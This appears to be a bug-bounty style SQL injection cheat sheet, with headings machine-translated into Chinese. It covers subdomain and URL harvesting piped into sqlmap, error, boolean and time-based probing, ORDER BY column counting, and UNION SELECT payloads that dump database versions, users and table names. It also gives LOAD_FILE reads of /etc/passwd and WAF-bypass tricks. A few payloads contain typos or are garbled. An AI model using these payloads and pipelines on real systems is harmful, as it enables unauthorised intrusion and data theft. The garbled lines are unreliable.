

1. 应用 Burpsuite:

  1. Capture the request using burpsuite.
  2. Send the request to burp scanner.
  3. Proceed with active scan.
  4. Once the scan is finished, look for SQL vulnerability that has been detected.
  5. Manually try SQL injection payloads.
  6. Use SQLMAP to speed up the process.

2. 应用 waybackurls 和其余工具:

  1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.)
  2. cat domains | httpx | tee -a alive
  3. cat alive | waybackurls | tee -a urls
  4. gf sqli urls >> sqli
  5. sqlmap -m sqli --dbs --batch
  6. use tamper scripts

3. 应用启发式扫描获取暗藏参数:

  1. Use subdomain enumeration tools on the domain.
  2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains.
  3. You can use the same method described above in 2nd point.
  4. Use Arjun to scan for the hidden params in the urls. 
  5. Use --urls flag to include all urls.
  6. Check the params as https://domain.com?<hiddenparam>=<value>
  7. Send request to file and process it through sqlmap.

4. 应用不受信赖的输出或特殊字符生成谬误:

  1. Submit single quote character ' & look for errors.
  2. Submit SQL specific query.
  3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response.
  4. Submit certain payloads that results in time delay.

5. 应用 order by 或 group by 或具备以下条件查找总列数:

  Submit a series of ORDER BY clause such as 
    'ORDER BY 1 --' ORDER BY 2 --
    ' ORDER BY 3 --
    and incrementing specified column index until an error occurs.

6. 应用联结运算符查找易受攻击的列:

  Submit a series of UNION SELECT payloads.
  (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.)

7. 应用 concat() 或 group_concat() 提取诸如 database()、version()、user()、UUID() 等根本信息

1. 数据库版本

    Oracle         SELECT banner FROM v$version
                 SELECT version FROM v$instance
    Microsoft         SELECT @@version
    PostgreSQL         SELECT version()
    MySQL         SELECT @@version

2. 数据库内容

    Oracle        SELECT * FROM all_tables
            SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
    Microsoft     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
    PostgreSQL     SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

    MySQL         SELECT * FROM information_schema.tables
                  SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

3. 显示版本、用户和数据库名称

' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database())

4. 应用 group_concat() 函数,用于连贯返回后果的所有行。

' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()–

8. 应用 load_file() 拜访系统文件。而后提前开发:

'UNION ALL SELECT LOAD_FILE ('/ etc / passwd')

9. 绕过 WAF:

1. 在 SQL 查问之前应用 Null 字节

    %00'UNION SELECT password FROM Users WHERE username-'xyz'--

2. 应用 SQL 内联正文序列


3. 网址编码

    for example :
    / URL encoded to %2f
    * URL encoded to %2a

    Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work.

4. 扭转大小写(大写 / 小写)

5. 应用 SQLMAP 篡改脚本。它有助于绕过 WAF/IDS/IPS。

6. 时间延迟:

      Oracle         dbms_pipe.receive_message(('a'),10)
      Microsoft     WAITFOR DELAY '0:0:10'
      PostgreSQL     SELECT pg_sleep(10)
      MySQL         SELECT sleep(10)

7. 有条件的延误:

      Oracle         SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
      Microsoft     IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
      PostgreSQL     SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
      MySQL         SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')
